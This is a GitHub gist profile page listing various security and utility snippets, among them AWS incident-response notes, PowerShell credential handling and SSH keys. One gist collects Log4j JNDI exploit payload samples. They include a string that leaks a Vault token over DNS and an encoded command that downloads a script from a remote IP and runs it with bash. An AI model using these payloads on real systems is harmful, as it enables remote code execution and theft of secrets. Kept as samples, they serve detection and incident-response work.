Skip to content

Instantly share code, notes, and snippets.

View am1ru1's full-sized avatar

@m1ru1 am1ru1

17 followers · 35 following
View GitHub Profile
@am1ru1
am1ru1 / IR_AWS_ATHENA.md
Created December 25, 2022 19:10
Incident Response AWS Athena

EC2 security group modifications

When reviewing an operational issue or security incident for an EC2 instance, the ability to see any associated security group change is a vital part of the analysis.

For example, if an EC2 instance triggers a CloudWatch metric alarm for high CPU utilization, we can first look to see if there have been any security group changes (the addition of new security groups or the addition of ingress rules to an existing security group) that potentially create more traffic or load on the instance. To start the investigation, we need to look in the EC2 console for the network interface ID and security groups of the impacted EC2 instance. Here is an example:

Network interface ID = eni-6c5ca5a8

Security group(s) = sg-5887f224, sg-e214609e

@am1ru1
am1ru1 / find_string_from_dump.ps1
Created September 1, 2022 18:22
$FindText = "hunttext" # <= Find this text
$MatchCase = $false
$MatchWholeWorld = $true
$MatchWildcards = $false
$MatchSoundsLike = $false
$MatchAllWordForms = $false
$Forward = $false
@am1ru1
am1ru1 / log4j exploit payload samples.txt
Last active March 3, 2024 22:09
${jndi:ldap://7ae364cd167c.bingsearchlib.com:39356/a}
${jndi:ldaps://e873c483.probe001.log4j.leakix.net:443/b%7D
${jndi:rmi://${env:VAULT_TOKEN}.example.com}
${jndi:dns://31-134-204-142.scanworld.net/ua}
${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8zOC44Ni4xOS4zNDo0NDN8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMzguODYuMTkuMzQ6NDQzKXxiYXNo}
@am1ru1
am1ru1 / vscode_shortcuts.md
Created February 24, 2021 16:01 — forked from bradtraversy/vscode_shortcuts.md
Helpful shortcuts for VSCode

VSCode Shortcuts

List of helpful shortcuts for faster coding

If you have any other helpful shortcuts, feel free to add in the comments of this gist :)

Official List of all commands

@am1ru1
am1ru1 / Python3File.py
Created October 24, 2020 18:08 — forked from Abizern/Python3File.py
Skeleton Python3 file template
#!/usr/bin/env python3 -tt
"""
Module documentation.
"""
# Imports
import sys
#import os
# Global variables
@am1ru1
am1ru1 / ed25519-key-20200521.pubkeys
Created September 18, 2020 17:14
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPDhm7L71SVdTG6hTyQGrZ/cO1Qo/m19fmMKLu1YCRDg ed25519-key-20200521
@am1ru1
am1ru1 / dexMD5.py
Created October 12, 2019 15:54 — forked from masbog/dexMD5.py
get dex MD5 of WhatsApp Application and get WhatsApp Version from an APK file
#!/usr/bin/env python3
# tweak up from https://github.com/mgp25/classesMD5-64/blob/master/dexMD5.py
# build AXML library from https://github.com/mikusjelly/axmlparser
# add xml manifest parse for getting WhatsApp Version
# to use this $ python3 dexMD5.py apk/WhatsApp.apk
# Output :
# WhatsApp Version : 2.17.296
# WhatsApp ClassesDEX MD5 : b'YrJNPljM3TuNFPIOZ+jziw=='
#
# @MasBog
@am1ru1
am1ru1 / Keybase.md
Created February 1, 2019 16:18

Keybase proof

I hereby claim:

  • I am am1ru1 on github.
  • I am am1ru1 (https://keybase.io/am1ru1) on keybase.
  • I have a public key ASC8kZvfU36mpW7wtIIisFE0POLhq85lecaSnjBTrgGWOgo

To claim this, I am signing this object:

@am1ru1
am1ru1 / install.sh
Created May 1, 2018 08:44
VPS install bash script for Ubuntu 16.04
# =================== YOUR DATA ========================
SERVER_NAME="some-server-name"
SERVER_IP="111.111.11.11"
USER="someuser"
SUDO_PASSWORD="secret-password-one"
MYSQL_ROOT_PASSWORD="secret-password-two"
@am1ru1
am1ru1 / Credential.ps1
Created September 7, 2016 07:50 — forked from nightroman/Credential.ps1
Get, export, and import credential
# credential file path
$CredentialPath = "$PSScriptRoot\credential.clixml"
# get and export credential
$credential = Get-Credential
$credential | Export-Clixml -LiteralPath $CredentialPath
# import credential
$credential = Import-Clixml -LiteralPath $CredentialPath
$credential